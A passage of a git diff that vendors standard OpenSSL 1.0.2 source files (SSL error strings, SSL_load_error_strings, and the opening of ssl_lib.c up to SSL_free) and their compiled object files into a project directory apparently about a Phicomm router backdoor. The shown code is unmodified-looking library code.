+    {ERR_REASON(SSL_R_WRONG_CERTIFICATE_TYPE), "wrong certificate type"},
+    {ERR_REASON(SSL_R_WRONG_CIPHER_RETURNED), "wrong cipher returned"},
+    {ERR_REASON(SSL_R_WRONG_CURVE), "wrong curve"},
+    {ERR_REASON(SSL_R_WRONG_MESSAGE_TYPE), "wrong message type"},
+    {ERR_REASON(SSL_R_WRONG_NUMBER_OF_KEY_BITS), "wrong number of key bits"},
+    {ERR_REASON(SSL_R_WRONG_SIGNATURE_LENGTH), "wrong signature length"},
+    {ERR_REASON(SSL_R_WRONG_SIGNATURE_SIZE), "wrong signature size"},
+    {ERR_REASON(SSL_R_WRONG_SIGNATURE_TYPE), "wrong signature type"},
+    {ERR_REASON(SSL_R_WRONG_SSL_VERSION), "wrong ssl version"},
+    {ERR_REASON(SSL_R_WRONG_VERSION_NUMBER), "wrong version number"},
+    {ERR_REASON(SSL_R_X509_LIB), "x509 lib"},
+    {ERR_REASON(SSL_R_X509_VERIFICATION_SETUP_PROBLEMS),
+     "x509 verification setup problems"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_SSL_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(SSL_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, SSL_str_functs);
+        ERR_load_strings(0, SSL_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..1252ea9657baa38424f7eb668e969771b54d37b9
GIT binary patch
literal 1360
zcmbtS%}T>S5S|#dY718JAXFrtRMe&Q2hoERO7&7iS_)nyq&2o;o0en?)q}o*kK!W;
zzJQP6QSs(QXPVt~yH*4pn9R(#^UY6o@A8Gi5yJo}1{^>?k|@B*NZ-%)+$<y@4)4>8
zA5U<U%k5h$<x0on9czzmvGhh}x6=zVx0`8}-d+u17)5Rpbqw|BxC~hKkuVdLWG*yd
z+!Vp+CXG}gHgS&w5xyYKi2Iw+4x{k)IV{f{x*^S=EU6I9XgUQ%*X(UEh*4z1_;;{}
z$9}-+4-85i!&zm{Xy+hk*skxhD&&hryU}va?NX^=2i(8(Y5`cH3~e&74GXTD+^GP=
z%+S`Q$K5UmcJ6QoSS1L6Ra?!b>mlZ~xXbXGHUjQcuS8t)I;`!t+OE&9f%$I3VQ$^N
z@SUbBn*YP3kV|)`|G})N8T|(lQ?4pY7!W4klRV2yN3%MA8P6wB|H@xSF4at<sv`TZ
zsUZ5YzqC6Frlz*lK=CC{Lez&|*}&anEcq7ts?e^goMAvUb^g6b()ZH&r<g~tIV<v|
zc@~4t3t$p0%_;d3AJ&^FkMu!#4Gm18r5ZY)F#Ya`@*w(K6euF#2$?}|82?2i)}qYN
G(fMCY{!h&S

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err2.c
new file mode 100644
index 0000000..14e4822
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err2.c
@@ -0,0 +1,69 @@
+/* ssl/ssl_err2.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+
+void SSL_load_error_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+    ERR_load_crypto_strings();
+    ERR_load_SSL_strings();
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_err2.o
new file mode 100644
index 0000000000000000000000000000000000000000..9d6387bd2e6c94c4249f90d7c3f8a0db1c1fc4de
GIT binary patch
literal 1368
zcmbtS%}T>S5T2O&U+@PHLPaVbRMaK)2hoERr1nxgC_*n1(l%DHO-ix_^`Nidqxc8~
zU&6;wym`@?WH)Zth@b<LnfWr`{Os<1sd6}A7$C)fefWwb3Q!&R@{5sMge;81+r<3)
z6O<1Q_VUZ8wXVmz`CYcjto6c9Hwp`P8y2&+R$>@3$elzTL@ghk0+#I&W}=eJ#0HGp
zV=%5Kja+tk<N*gFd`|o$?r%anWZ?B9EzeBdkY-SpRETCWodTk3MqBh_6qzve9gOhd
zA8<N>e#v4ut<0J19EL614T23;hm(_v-SV9V#eQIiJh=3lVO%FK%F#xBTe0w_&7B%B
zOpon_^tgM?fi)cN0IP)|u)5!FyB=bm&s~PswH|V(ekJ0j*JYi+@3;ZK0T#F|hq)K_
zdEm5N(fl7Khg`Zt{UnQ`W^x`P*5B*`;)Ka}CDNcI9nI?eCHy~v`d9uMa;c_;s*3Et
zs)Fdt{?cwMn3~#A1I3p-2~i(<ZGCr-vE=8`SA}*}<qQL=sq-I1lD?PDuVNm(>Y~V(
z=2;9nD}Yh7G^gZCJgqlTdh|hgi4BaQr5ZY)F#Ya`@+kT*QlN-{6J!d#H2#Z7Y$lnp
Hqw_xjvm#Mk

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_lib.c
new file mode 100644
index 0000000..e9ad2bc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_lib.c
@@ -0,0 +1,3534 @@
+/*
+ * ! \file ssl/ssl_lib.c \brief Version independent SSL functions.
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#ifdef REF_CHECK
+# include <assert.h>
+#endif
+#include <stdio.h>
+#include "ssl_locl.h"
+#include "kssl_lcl.h"
+#include <openssl/objects.h>
+#include <openssl/lhash.h>
+#include <openssl/x509v3.h>
+#include <openssl/rand.h>
+#include <openssl/ocsp.h>
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+const char *SSL_version_str = OPENSSL_VERSION_TEXT;
+
+SSL3_ENC_METHOD ssl3_undef_enc_method = {
+    /*
+     * evil casts, but these functions are only called if there's a library
+     * bug
+     */
+    (int (*)(SSL *, int))ssl_undefined_function,
+    (int (*)(SSL *, unsigned char *, int))ssl_undefined_function,
+    ssl_undefined_function,
+    (int (*)(SSL *, unsigned char *, unsigned char *, int))
+        ssl_undefined_function,
+    (int (*)(SSL *, int))ssl_undefined_function,
+    (int (*)(SSL *, const char *, int, unsigned char *))
+        ssl_undefined_function,
+    0,                          /* finish_mac_length */
+    (int (*)(SSL *, int, unsigned char *))ssl_undefined_function,
+    NULL,                       /* client_finished_label */
+    0,                          /* client_finished_label_len */
+    NULL,                       /* server_finished_label */
+    0,                          /* server_finished_label_len */
+    (int (*)(int))ssl_undefined_function,
+    (int (*)(SSL *, unsigned char *, size_t, const char *,
+             size_t, const unsigned char *, size_t,
+             int use_context))ssl_undefined_function,
+};
+
+int SSL_clear(SSL *s)
+{
+
+    if (s->method == NULL) {
+        SSLerr(SSL_F_SSL_CLEAR, SSL_R_NO_METHOD_SPECIFIED);
+        return (0);
+    }
+
+    if (ssl_clear_bad_session(s)) {
+        SSL_SESSION_free(s->session);
+        s->session = NULL;
+    }
+
+    s->error = 0;
+    s->hit = 0;
+    s->shutdown = 0;
+
+#if 0
+    /*
+     * Disabled since version 1.10 of this file (early return not
+     * needed because SSL_clear is not called when doing renegotiation)
+     */
+    /*
+     * This is set if we are doing dynamic renegotiation so keep
+     * the old cipher.  It is sort of a SSL_clear_lite :-)
+     */
+    if (s->renegotiate)
+        return (1);
+#else
+    if (s->renegotiate) {
+        SSLerr(SSL_F_SSL_CLEAR, ERR_R_INTERNAL_ERROR);
+        return 0;
+    }
+#endif
+
+    s->type = 0;
+
+    s->state = SSL_ST_BEFORE | ((s->server) ? SSL_ST_ACCEPT : SSL_ST_CONNECT);
+
+    s->version = s->method->version;
+    s->client_version = s->version;
+    s->rwstate = SSL_NOTHING;
+    s->rstate = SSL_ST_READ_HEADER;
+#if 0
+    s->read_ahead = s->ctx->read_ahead;
+#endif
+
+    if (s->init_buf != NULL) {
+        BUF_MEM_free(s->init_buf);
+        s->init_buf = NULL;
+    }
+
+    ssl_clear_cipher_ctx(s);
+    ssl_clear_hash_ctx(&s->read_hash);
+    ssl_clear_hash_ctx(&s->write_hash);
+
+    s->first_packet = 0;
+
+#if 1
+    /*
+     * Check to see if we were changed into a different method, if so, revert
+     * back if we are not doing session-id reuse.
+     */
+    if (!s->in_handshake && (s->session == NULL)
+        && (s->method != s->ctx->method)) {
+        s->method->ssl_free(s);
+        s->method = s->ctx->method;
+        if (!s->method->ssl_new(s))
+            return (0);
+    } else
+#endif
+        s->method->ssl_clear(s);
+    return (1);
+}
+
+/** Used to change an SSL_CTXs default SSL method type */
+int SSL_CTX_set_ssl_version(SSL_CTX *ctx, const SSL_METHOD *meth)
+{
+    STACK_OF(SSL_CIPHER) *sk;
+
+    ctx->method = meth;
+
+    sk = ssl_create_cipher_list(ctx->method, &(ctx->cipher_list),
+                                &(ctx->cipher_list_by_id),
+                                meth->version ==
+                                SSL2_VERSION ? "SSLv2" :
+                                SSL_DEFAULT_CIPHER_LIST, ctx->cert);
+    if ((sk == NULL) || (sk_SSL_CIPHER_num(sk) <= 0)) {
+        SSLerr(SSL_F_SSL_CTX_SET_SSL_VERSION,
+               SSL_R_SSL_LIBRARY_HAS_NO_CIPHERS);
+        return (0);
+    }
+    return (1);
+}
+
+SSL *SSL_new(SSL_CTX *ctx)
+{
+    SSL *s;
+
+    if (ctx == NULL) {
+        SSLerr(SSL_F_SSL_NEW, SSL_R_NULL_SSL_CTX);
+        return (NULL);
+    }
+    if (ctx->method == NULL) {
+        SSLerr(SSL_F_SSL_NEW, SSL_R_SSL_CTX_HAS_NO_DEFAULT_SSL_VERSION);
+        return (NULL);
+    }
+
+    s = (SSL *)OPENSSL_malloc(sizeof(SSL));
+    if (s == NULL)
+        goto err;
+    memset(s, 0, sizeof(SSL));
+
+#ifndef OPENSSL_NO_KRB5
+    s->kssl_ctx = kssl_ctx_new();
+#endif                          /* OPENSSL_NO_KRB5 */
+
+    s->options = ctx->options;
+    s->mode = ctx->mode;
+    s->max_cert_list = ctx->max_cert_list;
+
+    if (ctx->cert != NULL) {
+        /*
+         * Earlier library versions used to copy the pointer to the CERT, not
+         * its contents; only when setting new parameters for the per-SSL
+         * copy, ssl_cert_new would be called (and the direct reference to
+         * the per-SSL_CTX settings would be lost, but those still were
+         * indirectly accessed for various purposes, and for that reason they
+         * used to be known as s->ctx->default_cert). Now we don't look at the
+         * SSL_CTX's CERT after having duplicated it once.
+         */
+
+        s->cert = ssl_cert_dup(ctx->cert);
+        if (s->cert == NULL)
+            goto err;
+    } else
+        s->cert = NULL;         /* Cannot really happen (see SSL_CTX_new) */
+
+    s->read_ahead = ctx->read_ahead;
+    s->msg_callback = ctx->msg_callback;
+    s->msg_callback_arg = ctx->msg_callback_arg;
+    s->verify_mode = ctx->verify_mode;
+#if 0
+    s->verify_depth = ctx->verify_depth;
+#endif
+    s->sid_ctx_length = ctx->sid_ctx_length;
+    OPENSSL_assert(s->sid_ctx_length <= sizeof s->sid_ctx);
+    memcpy(&s->sid_ctx, &ctx->sid_ctx, sizeof(s->sid_ctx));
+    s->verify_callback = ctx->default_verify_callback;
+    s->generate_session_id = ctx->generate_session_id;
+
+    s->param = X509_VERIFY_PARAM_new();
+    if (!s->param)
+        goto err;
+    X509_VERIFY_PARAM_inherit(s->param, ctx->param);
+#if 0
+    s->purpose = ctx->purpose;
+    s->trust = ctx->trust;
+#endif
+    s->quiet_shutdown = ctx->quiet_shutdown;
+    s->max_send_fragment = ctx->max_send_fragment;
+
+    CRYPTO_add(&ctx->references, 1, CRYPTO_LOCK_SSL_CTX);
+    s->ctx = ctx;
+#ifndef OPENSSL_NO_TLSEXT
+    s->tlsext_debug_cb = 0;
+    s->tlsext_debug_arg = NULL;
+    s->tlsext_ticket_expected = 0;
+    s->tlsext_status_type = -1;
+    s->tlsext_status_expected = 0;
+    s->tlsext_ocsp_ids = NULL;
+    s->tlsext_ocsp_exts = NULL;
+    s->tlsext_ocsp_resp = NULL;
+    s->tlsext_ocsp_resplen = -1;
+    CRYPTO_add(&ctx->references, 1, CRYPTO_LOCK_SSL_CTX);
+    s->initial_ctx = ctx;
+# ifndef OPENSSL_NO_EC
+    if (ctx->tlsext_ecpointformatlist) {
+        s->tlsext_ecpointformatlist =
+            BUF_memdup(ctx->tlsext_ecpointformatlist,
+                       ctx->tlsext_ecpointformatlist_length);
+        if (!s->tlsext_ecpointformatlist)
+            goto err;
+        s->tlsext_ecpointformatlist_length =
+            ctx->tlsext_ecpointformatlist_length;
+    }
+    if (ctx->tlsext_ellipticcurvelist) {
+        s->tlsext_ellipticcurvelist =
+            BUF_memdup(ctx->tlsext_ellipticcurvelist,
+                       ctx->tlsext_ellipticcurvelist_length);
+        if (!s->tlsext_ellipticcurvelist)
+            goto err;
+        s->tlsext_ellipticcurvelist_length =
+            ctx->tlsext_ellipticcurvelist_length;
+    }
+# endif
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    s->next_proto_negotiated = NULL;
+# endif
+
+    if (s->ctx->alpn_client_proto_list) {
+        s->alpn_client_proto_list =
+            OPENSSL_malloc(s->ctx->alpn_client_proto_list_len);
+        if (s->alpn_client_proto_list == NULL)
+            goto err;
+        memcpy(s->alpn_client_proto_list, s->ctx->alpn_client_proto_list,
+               s->ctx->alpn_client_proto_list_len);
+        s->alpn_client_proto_list_len = s->ctx->alpn_client_proto_list_len;
+    }
+#endif
+
+    s->verify_result = X509_V_OK;
+
+    s->method = ctx->method;
+
+    if (!s->method->ssl_new(s))
+        goto err;
+
+    s->references = 1;
+    s->server = (ctx->method->ssl_accept == ssl_undefined_function) ? 0 : 1;
+
+    SSL_clear(s);
+
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_SSL, s, &s->ex_data);
+
+#ifndef OPENSSL_NO_PSK
+    s->psk_client_callback = ctx->psk_client_callback;
+    s->psk_server_callback = ctx->psk_server_callback;
+#endif
+
+    return (s);
+ err:
+    if (s != NULL)
+        SSL_free(s);
+    SSLerr(SSL_F_SSL_NEW, ERR_R_MALLOC_FAILURE);
+    return (NULL);
+}
+
+int SSL_CTX_set_session_id_context(SSL_CTX *ctx, const unsigned char *sid_ctx,
+                                   unsigned int sid_ctx_len)
+{
+    if (sid_ctx_len > sizeof ctx->sid_ctx) {
+        SSLerr(SSL_F_SSL_CTX_SET_SESSION_ID_CONTEXT,
+               SSL_R_SSL_SESSION_ID_CONTEXT_TOO_LONG);
+        return 0;
+    }
+    ctx->sid_ctx_length = sid_ctx_len;
+    memcpy(ctx->sid_ctx, sid_ctx, sid_ctx_len);
+
+    return 1;
+}
+
+int SSL_set_session_id_context(SSL *ssl, const unsigned char *sid_ctx,
+                               unsigned int sid_ctx_len)
+{
+    if (sid_ctx_len > SSL_MAX_SID_CTX_LENGTH) {
+        SSLerr(SSL_F_SSL_SET_SESSION_ID_CONTEXT,
+               SSL_R_SSL_SESSION_ID_CONTEXT_TOO_LONG);
+        return 0;
+    }
+    ssl->sid_ctx_length = sid_ctx_len;
+    memcpy(ssl->sid_ctx, sid_ctx, sid_ctx_len);
+
+    return 1;
+}
+
+int SSL_CTX_set_generate_session_id(SSL_CTX *ctx, GEN_SESSION_CB cb)
+{
+    CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+    ctx->generate_session_id = cb;
+    CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+    return 1;
+}
+
+int SSL_set_generate_session_id(SSL *ssl, GEN_SESSION_CB cb)
+{
+    CRYPTO_w_lock(CRYPTO_LOCK_SSL);
+    ssl->generate_session_id = cb;
+    CRYPTO_w_unlock(CRYPTO_LOCK_SSL);
+    return 1;
+}
+
+int SSL_has_matching_session_id(const SSL *ssl, const unsigned char *id,
+                                unsigned int id_len)
+{
+    /*
+     * A quick examination of SSL_SESSION_hash and SSL_SESSION_cmp shows how
+     * we can "construct" a session to give us the desired check - ie. to
+     * find if there's a session in the hash table that would conflict with
+     * any new session built out of this id/id_len and the ssl_version in use
+     * by this SSL.
+     */
+    SSL_SESSION r, *p;
+
+    if (id_len > sizeof r.session_id)
+        return 0;
+
+    r.ssl_version = ssl->version;
+    r.session_id_length = id_len;
+    memcpy(r.session_id, id, id_len);
+    /*
+     * NB: SSLv2 always uses a fixed 16-byte session ID, so even if a
+     * callback is calling us to check the uniqueness of a shorter ID, it
+     * must be compared as a padded-out ID because that is what it will be
+     * converted to when the callback has finished choosing it.
+     */
+    if ((r.ssl_version == SSL2_VERSION) &&
+        (id_len < SSL2_SSL_SESSION_ID_LENGTH)) {
+        memset(r.session_id + id_len, 0, SSL2_SSL_SESSION_ID_LENGTH - id_len);
+        r.session_id_length = SSL2_SSL_SESSION_ID_LENGTH;
+    }
+
+    CRYPTO_r_lock(CRYPTO_LOCK_SSL_CTX);
+    p = lh_SSL_SESSION_retrieve(ssl->ctx->sessions, &r);
+    CRYPTO_r_unlock(CRYPTO_LOCK_SSL_CTX);
+    return (p != NULL);
+}
+
+int SSL_CTX_set_purpose(SSL_CTX *s, int purpose)
+{
+    return X509_VERIFY_PARAM_set_purpose(s->param, purpose);
+}
+
+int SSL_set_purpose(SSL *s, int purpose)
+{
+    return X509_VERIFY_PARAM_set_purpose(s->param, purpose);
+}
+
+int SSL_CTX_set_trust(SSL_CTX *s, int trust)
+{
+    return X509_VERIFY_PARAM_set_trust(s->param, trust);
+}
+
+int SSL_set_trust(SSL *s, int trust)
+{
+    return X509_VERIFY_PARAM_set_trust(s->param, trust);
+}
+
+int SSL_CTX_set1_param(SSL_CTX *ctx, X509_VERIFY_PARAM *vpm)
+{
+    return X509_VERIFY_PARAM_set1(ctx->param, vpm);
+}
+
+int SSL_set1_param(SSL *ssl, X509_VERIFY_PARAM *vpm)
+{
+    return X509_VERIFY_PARAM_set1(ssl->param, vpm);
+}
+
+X509_VERIFY_PARAM *SSL_CTX_get0_param(SSL_CTX *ctx)
+{
+    return ctx->param;
+}
+
+X509_VERIFY_PARAM *SSL_get0_param(SSL *ssl)
+{
+    return ssl->param;
+}
+
+void SSL_certs_clear(SSL *s)
+{
+    ssl_cert_clear_certs(s->cert);
+}
+
+void SSL_free(SSL *s)
+{
+    int i;
+
+    if (s == NULL)
+        return;
+
+    i = CRYPTO_add(&s->references, -1, CRYPTO_LOCK_SSL);
+#ifdef REF_PRINT
+    REF_PRINT("SSL", s);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "SSL_free, bad reference count\n");
+        abort();                /* ok */
+    }
+#endif
+
+    if (s->param)
+        X509_VERIFY_PARAM_free(s->param);
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_SSL, s, &s->ex_data);
+
+    if (s->bbio != NULL) {
+        /* If the buffering BIO is in place, pop it off */
+        if (s->bbio == s->wbio) {
+            s->wbio = BIO_pop(s->wbio);
+        }
+        BIO_free(s->bbio);
+        s->bbio = NULL;
+    }
+    if (s->rbio != NULL)
+        BIO_free_all(s->rbio);
+    if ((s->wbio != NULL) && (s->wbio != s->rbio))
+        BIO_free_all(s->wbio);
+
+    if (s->init_buf != NULL)
+        BUF_MEM_free(s->init_buf);
+
+    /* add extra stuff */
+    if (s->cipher_list != NULL)
+        sk_SSL_CIPHER_free(s->cipher_list);
+    if (s->cipher_list_by_id != NULL)
+        sk_SSL_CIPHER_free(s->cipher_list_by_id);
+
+    /* Make the next call work :-) */
+    if (s->session != NULL) {
+        ssl_clear_bad_session(s);
+        SSL_SESSION_free(s->session);
+    }
+
+    ssl_clear_cipher_ctx(s);
+    ssl_clear_hash_ctx(&s->read_hash);
+    ssl_clear_hash_ctx(&s->write_hash);
+
+    if (s->cert != NULL)
+        ssl_cert_free(s->cert);
+    /* Free up if allocated */
+
+#ifndef OPENSSL_NO_TLSEXT
+    if (s->tlsext_hostname)
+        OPENSSL_free(s->tlsext_hostname);
+    if (s->initial_ctx)
